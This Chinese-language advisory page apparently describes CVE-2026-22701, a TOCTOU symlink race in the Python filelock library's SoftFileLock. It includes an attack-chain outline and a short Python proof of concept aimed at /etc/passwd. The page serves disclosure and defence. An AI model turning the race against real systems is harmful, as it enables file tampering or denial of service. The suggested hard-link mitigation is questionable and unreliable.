CVE-2026-22701 CVSS 5.3 中危

CVE-2026-22701 filelock SoftFileLock TOCTOU竞态条件漏洞

披露日期: 2026-01-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-22701

漏洞类型

TOCTOU竞态条件

CVSS评分

5.3 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

filelock (Python package)

漏洞概述

filelock是Python的一个平台无关文件锁库。在3.20.3之前的版本中，SoftFileLock实现存在TOCTOU（检查时间-使用时间）竞态条件漏洞。攻击者需要具备本地文件系统访问权限和创建符号链接的权限，利用权限验证与文件创建之间的时间窗口，在raise_on_not_writable_file()权限检查和os.open()文件创建之间插入恶意操作。通过在此竞态窗口期间创建符号链接，攻击者可使锁操作作用于意外的目标文件或导致拒绝服务。

技术细节

该漏洞源于SoftFileLock._acquire()方法中的TOCTOU竞态条件。在权限检查（raise_on_not_writable_file()）完成后、文件创建（os.open()）前的时间窗口内，攻击者可创建符号链接，使锁操作作用于符号链接指向的目标文件。这可能导致未授权访问、文件损坏或服务中断。攻击需要本地访问权限和创建符号链接的能力。

攻击链分析

STEP 1

攻击者获得本地文件系统访问权限

STEP 2

识别目标filelock应用及其锁文件位置

STEP 3

在权限检查后、文件创建前的时间窗口创建符号链接

STEP 4

触发锁操作，使其作用于符号链接目标

STEP 5

实现未授权访问、文件损坏或拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import os
import time
import threading
import filelock

def exploit():
    target = '/etc/passwd'
    lock_file = '/tmp/app.lock'
    
    # 清理旧文件
    if os.path.exists(lock_file):
        os.unlink(lock_file)
    
    # 竞态条件PoC
    def attack():
        time.sleep(0.001)  # 等待权限检查完成
        os.symlink(target, lock_file)
    
    t = threading.Thread(target=attack)
    t.start()
    
    lock = filelock.SoftFileLock(lock_file)
    lock.acquire(timeout=1)
    
    t.join()
    print('PoC完成')

if __name__ == '__main__':
    exploit()

影响范围

filelock < 3.20.3

防御指南

临时缓解措施

在修复版本发布前，可通过限制符号链接创建权限、使用硬链接替代符号链接、或在应用层实现额外的文件锁定检查来缓解风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表